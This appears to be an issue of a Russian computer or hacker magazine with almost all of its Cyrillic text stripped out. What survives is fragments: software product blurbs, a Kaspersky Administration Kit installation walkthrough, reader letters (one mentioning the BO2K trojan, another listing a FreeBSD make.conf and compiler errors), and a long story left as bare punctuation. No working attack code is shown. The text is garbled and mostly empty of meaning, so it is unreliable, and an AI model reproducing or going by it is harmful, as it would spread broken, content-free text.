, AVI, MPEG,
MPEG 1, MPEG 2, MPEG 4, VCD,
DVD, SVCD, RMVB, RM, WMV,
MOV, DIVX -.
.

,

. :

DVD/VCD/SVCD;
AVI,
DVD, VCD, SVCD, MPEG,
MPEG 1, MPEG 2, MPEG 4,
RM, RMVB, WMV
-;

;

.

Amor SWF to Video


Converter 2.3.8

NeuroSolutions
NeuroDimension, Inc
.
: ( ),
,
,
, .

Secure iNet Factory


v5.8 for Java
Secure iNet Factory Java
.
SSH
,
FTP, SMTP, POP3,
IMAP, HTTP, Telnet .

, . , , ,
.

php2exe
,
php-

exe-. , ..

, .
, , - , , ,
.
,
exe system32 php5ts.dll.
- , 5.1

5.0,
: 5.0 5.1.
5.0, php5ts.dll 5.1, ,
, , ,
5.1
php5ts.dll 5.0, .

Online Armor v1.1.1.826


spyware, adware,
.. ,
.

NeuroSolutions v5.03
Developer Edition

Amor SWF to Video Converter


SWF Macromedia Flash AVI, MPEG, VCD, SVCD DVD.
, .
, Amor SWF to Video Converter
SWF MP3 WAV,
JPEG-.

Fresh Diagnose v7.38


Fresh Devices.
Fresh Diagnose .
, , .
Fresh Diagnose
, , , . , Fresh Diagnose .
.

AVG Free
Edition 7.1.405

:
, ,
,
. ,
.
,
. ( Kerio Personal, Zone Alarm Pro
, Windows XP),

- .

PIMone Ver 5.1


Build:2006.7.4.145
PIMone , , ,
, .
,
!

Keyboard Maniac 4.2


, : Keyboard Maniac (KeyMan)
,

,
. .
Genius KB12e KB16e

Media Key.
, , . KeySpy,
.
( Genius KB12e) ( 255 0 128).
: ,
. , , , Windows,
. .

soft
admining
.
, . 2

(SANPRIH@MAIL.RU)

,
,
.
,
, .
: .

.

.
( )
. .
.

. . ,
, .
, :

,

.
.
, .

.
,
.


, , , . , ,
, , .

,
-
.

.
- .
,
. , .
. .
. Kaspersky Administration Kit
   Next 
  Next 
Kaspersky
Administration Kit, 

 Next  .
-,
.
LAN  -. . , , ,
,

,

.
, , updater.
 Next.
.
,
.
, . Next. : ,

36 .
, :
,
,
.
,
Next, ,
.
:
, ,
. 
Properties
. :
, , ,
.

.
:


Properties 


.

. ,

, , , ,

. :
, , .
,

SRV.
   . ,
: Next 


5.0 Windows
Workstation   Next 
  ... 
  .
, 
 .
- ,
. Next.
,
,

,

. Next.

. Next. : . N
.

. ,
,
, , .
Next . .
,

, , . . .
,
, ..,

-.
.

,

. ,
.
.
.
:
, ,

.
SRV.
SRV
.

.
,
.
,
.
,  .
,

12.30.


.
,
,
SRV. ,

.
. , ,
5.0
Windows Workstation voila.

. ,
. ,
, . ,
, .

,
  .

:   



.
,
,
.
, ,
,

.
:
. Active Directory, IP-.



. , ,
,
.
. .


. , .

.


.
: . , ,
,
, , ,


.

,
.
.
: , , ,
, .
,
Workstation.
Workstation 

, , .
Workstation.
.
Workstation
. .
- ,
.
,

,
. .
,

. , . , ,
.

crew
e-mail
! SPEC@REAL.XAKEP.RU
SkyWriter

devgena@atnet.ru
JohnDaRippah

, !
DVD?
, , .
.
!
, DVD , ,
, ,
. , -
, ,
, . !
, .

flex-mx@yandex.ru


, .
, , , ,
: .
, .
: ,
. . !
!
! . !
! , ! ,
, , ,
. , ,
, , , .
!!! ! !!!
15 . ,
, . , web-money
, WMZ , ?
! !!!

, !
! - - . ,
.
! ,
,
, ,
.
, .
! . , ,
, !
! ...
(
WebMoney ).

nonamex@list.ru


, !!!
- . ,
.
, .
- ?
!
, !
: -
MPG, - AVI, - WMV - , -.
, , -
EXE! , -
.
, 1.5 , dialup'. ,
? , , :
dialup'! !
,
-. , , ,
, . ,
:-).
. !

artur@moyapochta.ru

magazin

***

, !
magazin ( )!
, ( ). *nix' ! , !
.. X ? (
).
, -!
. ? ,
? , . ... , ?
, ,

Visual Fortran, 2 . - ! .
,
- ,
.NET. Microsoft
. ,
RAD, !
P.S. ,
, , .
, .

shtrenyov@mail.ru

-
!
-, ,
FreeBSD 5.3 release. make.conf, ,
:
cc: aicasm.o: No such file or directory
cc: aicasm_symbol.o: No such file or directory
cc: aicasm_gram.o: No such file or directory
cc: aicasm.o_macro_gram: No such file or directory
cc: aicasm.o_scan: No such file or directory
cc: aicasm_macro_scan.o: No such file or directory
make.conf
CPU_TYPE?=p3
CPU_TYPE=p3
COMPAT4X=true
CFLAGS=-ol -pipe -march=pentium3 mtune=pentium3 NO_CPU_FLAGS=false
NO_CPU_COPTFLAGS=false
MAKE_KERBEROS4=false MAKE_KERBEROS4=false NO_BIND=true
NO_SENDMAIL=true NO_GAMES=true
PERL_VER=5.8.5
PERL_VERSION=5.8.5
PERL_ARCH=mach
NOPERL=no
WITH_PERL=yes
WITHOUT_PERL=no
FORCE_PKG_REGISTER=yes
,
<CENSORED>
,
Dr. Klouniz (
-)

, SPEC.

.? ........
,
, !
,
., - . .
,
.
,
, ( hard ;-).
,
.

catcorp@rambler.ru
help
, , -! ,
, BO2K 1.1.3, - ,

, .
!!! ;-)
, .
2000 1.1.3 . : -
.
,
. , ,
Trojan (Virus) Installation System. , !
!

root-god@gmail.ru

story
:
( - )

,
!.
NIRO (NIRO@REAL.XAKEP.RU)

, , , . , , ,
.
,
. , ; , ,
. . .
, .
, - ,
, ... . ,
. ...
!
,
, .
- , .
...
.
.
, .
. , ... - , - .
! , , . ,
.
.
, . . ...
, .
. , , .

- , ,

...
;
, , ,
, ,
...
.

.
... . . .
, . .
!
.
. .
, . , ,
. , ,
.
!
, . .
! !
- . , .
, , .
. .
.
! .
!
, , .
, , . .
. .
. .
.
. - , , , . ,
. . - ,
.
. . . .
, .
, . . .
.
...
.
.
, . , , ...
.
, , ,

, .
. , . ,
:
, - . , .
. . ,
.
- .
; , ,
.
, .
, . . - ,
, .
, .
. , , .
. . .
. ,

. ,
,
.
- , , , ...
. ,
. ,
, . , . , ,
, ...
; .
, , .
, . ,
...
, ,
,
. , ,
, ...
.
. , . ,
, . ,
, ,
.
...
... ? ... . . . ? ? ....
, . , . . . . ...
, , , . .
, .
, , , .
,
. .
,
, . ,
, , , , .

, , , ,
-
. ...
. ,
, . ,
- .
,
- ,
.
. , . ,
, .
, , . , .
.
?
, . .
... , ?
,
.
? , , .
, ... , . ,
, , ,
? , , ; , ,
!.
. ,
, , . , , .
, , . , .
. . .
. . , ,
!
, ... , , . , ?
?
, . ,
. , , . ,
.
, . .
... . .
. ... , . .
. , ,
. , , ,
. ,
... ...
,
.
. , , , ( ,
). .
. ,
. . .
. . .
, . .
. . . , .
. , . .
, , ?

?
, .
. .
? . ?
?
. , ,
.
, ?
.
,
. ,
, , . , , ,
. ,
, , .
...
?
? ? . , . , , .
.
?
, . ,
, . - .
?
, .
, . ,
,
. , - ,
,
, . , . , , , , , , .
, .

! .
,
. . . , .
- ? . ? , , ?
, .

. .
, .
. .
. - , , .
,
.
! .
!
, .
,
.
, ...
, . : . , ,
, .
, .
, , :
?
, . ?
...
. ?

, ,
.
, .
. ,
, , ,
, . , ,
. . , .
, . .
. . . , ,
,
, .
, , , .
, .
, , ...
, . .
. ?
, , . - ,
, . , ,
.
, .
?
, ,
. . .
.
... ?
? ? .
, .
.
?
, . .
, . . ,
. .
, ,
.
- , , . .
. , . ,
, , .
, , . , .
, , . , , .
. .
.
, .
? .
, . , .
.
. , :
... , , , ...
?
, ,
. , .
, .
...
.
? ?
? , ?
.
? ,
?..
, ... ,
, ...
:
, ,

? ?
, . .

. , . ?
. ...
?
?
, ? , , , .
.
, , ,
. ,
.

. , , . ,
, .

.
, .
. , ,
, , ,
, .
.
, ,
, .

.
, . ,
.
.
. ,
.
.
.
, , ,
. ... ... .
.
- ,
.
, , ... ,
.
- ,
, .

.
.

,
.
.
,
,
! .
-?
- !

-,

,

-, ,
, .
, .
.
, . .
, ,
, , .
,
.

.
.
, , .
, .
, . , , , . ,
.
.
. ;
, , . ;
.
, ,
. , ,
.
. .
, ,
. ;
.
? . , ? , ... . , .
. , , , ...
. ,
.
, .
? . .
. . .
, . , ...
, , - .
? - ? ! . ,

!
... ,

. ,
. , .
, .
, , ,
. . . , .
. , , , . ?
.
, . ... ?
.
... .
, , . ...
. .
, . , , ,
? .
. , , , - .
, ! ,

. , ,
, . , ,
, . , , , .
, , .
. .
, .
. .
. .
. . . ,
, .
.
, .
...
, , . , ,
.
? . !
, , , ,
, :
.
.
,
. , , , . , ,
.
, , . , . , .
, . ,
,
- , , .
, . . -




.
,

,


, . ,
.
.
. . .
, ;
.
. .
. ,
, .
,
,
.
, , .
? .
, . .
?
, . ?
. , . , ,
.
,
, .
, , . - .

, . , ,
.
.
, .
.
, ,
.
, ,
, - ...
, .
.
, , .
.
, , . ,
,
.

. . ,
, , , .
, , ,
. ...

, .
, . , , . . .
, .
, , , .
.
, .
, , ... .
, .
, ...
. ,
, .
?
, , .
...
. - , -...
.
. , . . , .
.
, ... . ...
, , .
, .
, ? , - ...
,
- .
, , .
.

, . ,
, , , , , , .
, , :
... ?
, , .
? ?
? - , ,
.
. ?
, . - , ,
.
, . , , ,
, . , ...
, . .
. ? ?
?
,
, .
, .
, , . . , , ,
, , ....
,
, . , , .
.
. . , .
, - .
, , , , . ?
. ,
. , . , . , . ,
, .

?
,
.
, , ,
,

, .
, .
.
, .
,
?
.
,
.
. -

. , . , ...
?
. .
,
.
, , , , . ,
.
...
?
, . . .
. .
, . , , ! -
. ,
, . ,
. , . , ,
. .
, . ,
?
. . , .
. ,
.
, . .

.
.
.
.

.
... ..., .

. , , . , ,
, .
.
.
, -
:
- ... ... ,
...
- , ,
, , , , , . , , ,
.
. . , . .
... , . , , ,
. ?
, - ,
, . , , .
, . . , ...
, .
.
. , ,
, . , ,
.

. ... . ? ? ?
! .
, . . . , - ,

?
- , .
.
, , . - , , :
?
.
, .
, . , , ,
, ... ,
, , , ,
. .
.
. , - ,
. ...
, .
,
. ,
. .
. .
, ? -
- ,
.
. .
, . ,
. , ...
...
?
. . . . ...
, . .
... . .
?
, .
?
.
. , . ,
, , , ... - . ? --!

.
.

, . ,
.
? ,
.
, .
. . , .
, . , . . .
. . .
.
, , .
.
, , . . , .
. -. ...

, . - . , , , . , , , .
.
, - .
, , , , . , ,
- , . ,
, ,
, .
! . ! ?!
!
. ,
. , , , .
. ,
, . , , .
,
, . , . , .
, ?
.
. - . , , .
, . ...
, , . - . . .
. ,
, .
, ... . ...
.
, .
? .
? , ,
. ?
, . , , . .
, , .
? .
. -. ,
, , . ...
, ,
.
... ... , ,
? -?
, .
? , ? , ?
, .
. ,
...
, , .
, . , .
, ... .
, , , ... , , . , .
.
, ... ,
. . ... ...
? , .
. .
, . ,
. ,

. . ,
: .

? ,
, ,
.
.
. : , ?,
: !
, :
.
: ,
. :
: ,
. :
,
. , ,
.

. . ?
.
. , ... ,
,
, , .
. - , ,
, - . ,
.
,
,
( ,
, , . ?!
! , ,
, !)
.
, 18-20 , !
,

, ,
,
, , ,
.
. , . .

.
SMS', ,


,
, , .
, ,
,
. ,
,
,
.
Open Source
.
,
.
.
,

. ,
,
( ,
),
, .
!
!
,
! ? ,
?!
! , .
.
.
.

, ?!
, .
, , ,
. , . , .
, -


.
,
. ,
,
, , , - . .

,
, ,
.

, .

,
,

. 99%
,
, , .
, !
!

. ...
...
. .
, . ,
( ,
)
, .
, , , .
, , ( ), ...
.
: - . , , .
